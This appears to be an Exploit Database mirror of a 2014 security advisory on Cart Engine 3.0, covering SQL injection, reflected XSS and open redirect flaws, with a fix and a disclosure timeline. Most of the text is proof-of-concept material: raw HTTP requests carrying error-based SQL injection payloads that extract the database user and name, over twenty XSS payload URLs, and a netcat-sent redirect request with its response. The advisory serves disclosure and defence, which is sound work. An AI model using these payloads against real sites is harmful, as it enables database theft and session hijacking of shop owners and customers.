Cart Engine 3.0 – Multiple Vulnerabilities

• Exploit Database
• 38 阅读

• 作者： Quantum Leap
  日期： 2014-09-25
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/34764/

• === Details ===
  Quantum Leap Advisory: http://www.quantumleap.it/cart-engine-3-0-multiple-vulnerabilities-sql-injection-reflected-xss-open-redirect/
  Affected Product: Cart Engine
  Version: 3.0
  
  === Executive Summary ===
  
  SQL Injection: Using a specially crafted HTTP request, it is possible to exploit
  a lack in the validation[1] of the “item_id[0]” and “item_id[]” input parameters
  of cart.php page. Successful exploitation of the vulnerabilities results in read
  sensitive data from the database and, in some cases, execute administration
  operation on the database or issue commands to the operating system.
  
  Reflected XSS: Using a specially crafted HTTP request, it is possible to exploit
  a lack in the neutralization[2] of multiple pages output which includes the user
  submitted content. Successful exploitation of the vulnerabilities, results in
  the execution of arbitrary HTML and script code in the user’s browser in the context of
  the victim user's session trough a “Reflected XSS”.
  
  Open Redirect: Using a specially crafted HTTP request, it is possible to
  redirect[3] the normal browsing of users to a malicious site by modifying
  untrusted URL input in Referer HTTP header parameter in index.php, cart.php,
  msg.php and page.php pages. Successful exploitation of the vulnerabilities
  results in phishing scam, user credential theft, malware dissemination.
  
  === Proof of Concept ===
  
  = SQL Injection (based on MySQL) =
  
  A SQL Injection vulnerability has been detected on cart.php page in Cart Engine
  CMS. The function “sql_query” in file “cart.php” doesn’t sanitize the “$item_id”
  parameter, so error based and boolean-based blind or time-based blind SQL
  Injection attacks can be executed.
  
  
  ## HTTP REQUEST - injection on item_id[0] parameter ##
  POST /cart.php HTTP/1.1
  Host: eshop.hacme.hac
  User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:24.0) Gecko/20140722 Firefox/24.0 Iceweasel/24.7.0
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  Accept-Language: en-US,en;q=0.5
  Accept-Encoding: gzip, deflate
  Referer: http://eshop.hacme.hac/detail.php?item_id=8
  Cookie: PHPSESSID=iost0tdmvdobp966rbppa514f3; ce3_history[0]=12; ce3_history[1]=8
  Connection: keep-alive
  Content-Type: multipart/form-data; boundary=---------------------------109606523931762158449252347
  Content-Length: 774
  
  -----------------------------109606523931762158449252347
  Content-Disposition: form-data; name="AXSRF_token"
  
  
  -----------------------------109606523931762158449252347
  Content-Disposition: form-data; name="cmd"
  
  add
  -----------------------------109606523931762158449252347
  Content-Disposition: form-data; name="item_id[0]"
  
  8' AND (SELECT 22 FROM (SELECT COUNT(*), CONCAT(0x3a,0x3a,(SELECT user()),0x3a,0x3a,FLOOR(RAND()*2))a FROM INFORMATION_SCHEMA.columns GROUP BY a)b) AND 'ql'='ql
  -----------------------------109606523931762158449252347
  Content-Disposition: form-data; name="qty[0]"
  
  1
  -----------------------------109606523931762158449252347
  Content-Disposition: form-data; name="qty[0]"
  
  1
  -----------------------------109606523931762158449252347--
  ## EOF HTTP REQUEST ##
  
  ## HTTP REQUEST - injection on item_id[] parameter ##
  POST /cart.php HTTP/1.1
  Host: eshop.hacme.hac
  User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:24.0) Gecko/20140722 Firefox/24.0 Iceweasel/24.7.0
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  Accept-Language: en-US,en;q=0.5
  Accept-Encoding: gzip, deflate
  Referer: http://eshop.hacme.hac/detail.php?item_id=13
  Cookie: PHPSESSID=aci236dihehpjaldchbt6k6v23; ce3_history[0]=24; ce3_history[1]=13
  Connection: keep-alive
  Content-Type: multipart/form-data; boundary=---------------------------1948855485207142787318084006
  Content-Length: 2353
  
  -----------------------------1948855485207142787318084006
  Content-Disposition: form-data; name="AXSRF_token"
  
  
  -----------------------------1948855485207142787318084006
  Content-Disposition: form-data; name="cmd"
  
  add
  -----------------------------1948855485207142787318084006
  Content-Disposition: form-data; name="item_id[0]"
  
  13
  -----------------------------1948855485207142787318084006
  Content-Disposition: form-data; name="qty[0]"
  
  1
  -----------------------------1948855485207142787318084006
  Content-Disposition: form-data; name="qty[0]"
  
  1
  -----------------------------1948855485207142787318084006
  Content-Disposition: form-data; name="prod_opt_3"
  
  3
  -----------------------------1948855485207142787318084006
  Content-Disposition: form-data; name="prod_opt_12"
  
  
  -----------------------------1948855485207142787318084006
  Content-Disposition: form-data; name="item_id[]"
  
  
  -----------------------------1948855485207142787318084006
  Content-Disposition: form-data; name="qty[]"
  
  1
  -----------------------------1948855485207142787318084006
  Content-Disposition: form-data; name="item_id[]"
  
  ' AND (SELECT 22 FROM (SELECT COUNT(*), CONCAT(0x3a,0x3a,(SELECT database()),0x3a,0x3a,FLOOR(RAND()*2))a FROM INFORMATION_SCHEMA.columns GROUP BY a)b) AND 'ql'='ql
  -----------------------------1948855485207142787318084006
  Content-Disposition: form-data; name="qty[]"
  
  1
  -----------------------------1948855485207142787318084006
  Content-Disposition: form-data; name="item_id[]"
  
  
  -----------------------------1948855485207142787318084006
  Content-Disposition: form-data; name="qty[]"
  
  1
  -----------------------------1948855485207142787318084006
  Content-Disposition: form-data; name="item_id[]"
  
  
  -----------------------------1948855485207142787318084006
  Content-Disposition: form-data; name="qty[]"
  
  1
  -----------------------------1948855485207142787318084006
  Content-Disposition: form-data; name="item_id[]"
  
  
  -----------------------------1948855485207142787318084006
  Content-Disposition: form-data; name="qty[]"
  
  1
  -----------------------------1948855485207142787318084006
  Content-Disposition: form-data; name="item_id[]"
  
  
  -----------------------------1948855485207142787318084006
  Content-Disposition: form-data; name="qty[]"
  
  1
  -----------------------------1948855485207142787318084006--
  ## EOF HTTP REQUEST ##
  
  = Reflected XSS =
  
  A Reflected XSS vulnerability has been detected on multiple pages in Cart Engine
  CMS. In the file "skins/default/outline.tpl", the parameter "path" in section
  "drop down TOP menu (with path)" and the parameter "$print_this_page" in section
  "footer_content_block" are not sanitized, so an XSS attack can be executed on
  multiple pages.
  
  ## HTTP REQUESTS ##
  /index.php?"><script>alert('XSS')<%2fscript>
  /index.php?'%3balert('XSS')%2f%2f
  /checkout.php?%27%3balert%28%27XSS%27%29%2f%2f
  /checkout.php?%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E
  /contact.php?"><script>alert('XSS')<%2fscript>
  /contact.php?'%3balert('XSS')%2f%2f
  /detail.php?item_id=10&'%3balert('XSS')%2f%2f
  /detail.php?item_id=10&"><script>alert('XSS')<%2fscript>
  /distro.php?'%3balert('XSS')%2f%2f
  /distro.php?"><script>alert('XSS')<%2fscript>
  /newsletter.php?'%3balert('XSS')%2f%2f
  /newsletter.php?"><script>alert('XSS')<%2fscript>
  /page.php?pid=2&"><script>alert('XSS')<%2fscript>
  /page.php?pid=2&'%3balert('XSS')%2f%2f
  /profile.php?"><script>alert('XSS')<%2fscript>
  /profile.php?'%3balert('XSS')%2f%2f
  /search.php?mod_id=_shop&cmd=list&cat_id=1&'%3balert('XSS')%2f%2f
  /search.php?mod_id=_shop&cmd=list&cat_id=1&"><script>alert('XSS')<%2fscript>
  /sitemap.php?'%3balert('XSS')%2f%2f
  /sitemap.php?"><script>alert('XSS')<%2fscript>
  /task.php?mod=qcomment&m=gbook&i=1&t=cy9NLS5Jys%2FPBgA%3D&"><script>alert('XSS')<%2fscript>
  /task.php?mod=qcomment&m=gbook&i=1&t=cy9NLS5Jys%2FPBgA%3D&'%3balert('XSS')%2f%2f
  /tell.php?'%3balert('XSS')%2f%2f
  /tell.php?"><script>alert('XSS')<%2fscript>
  ## EOF HTTP REQUEST ##
  
  = Open Redirect =
  
  An Open Redirect vulnerability has been detected on multiple pages in Cart
  Engine CMS. The function "redir" in file "includes/function.php" doesn't check
  the "$_SERVER['HTTP_REFERER']" parameter, so an Open Redirect attack can be
  executed.
  
  ## HTTP REQUEST ##
  GET /page.php HTTP/1.1
  Host: eshop.hacme.hac
  User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:24.0) Gecko/20140722 Firefox/24.0 Iceweasel/24.7.0
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  Accept-Language: en-US,en;q=0.5
  Accept-Encoding: gzip, deflate
  Referer: http://www.google.com/search?hl=en&q=
  Cookie: PHPSESSID=rtg5ooetpj7resie416iu9b2s6
  Connection: close
  
  
  $ cat openredirect.req | nc -vvv eshop.hacme.hac 80
  hacme.hac [10.0.2.80] 80 (http) open
  HTTP/1.1 302 Found
  Date: Sun, 10 Aug 2014 15:16:34 GMT
  Server: Apache/2.2.15 (CentOS)
  X-Powered-By: PHP/5.3.3
  Expires: Thu, 19 Nov 1981 08:52:00 GMT
  Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
  Pragma: no-cache
  Location: http://www.google.com/search?hl=en&q=
  Content-Length: 0
  Connection: close
  Content-Type: text/html; charset=UTF-8
  
   sent 403, rcvd 380
  
  === Solution ===
  
  Upgrade to Cart Engine 4.0.
  
  === Disclosure Timeline ===
  
  2014-08-08 – Vulnerability Discovered
  2014-08-10 – Initial vendor notification
  2014-08-20 – The vendor fixed the vulnerability
  2014-09-15 – Public advisory
  
  === References ===
  
  [1] https://www.owasp.org/index.php/SQL_Injection_Prevention_Cheat_Sheet
  [2] https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet
  [3] https://www.owasp.org/index.php/Unvalidated_Redirects_and_Forwards_Cheat_Sheet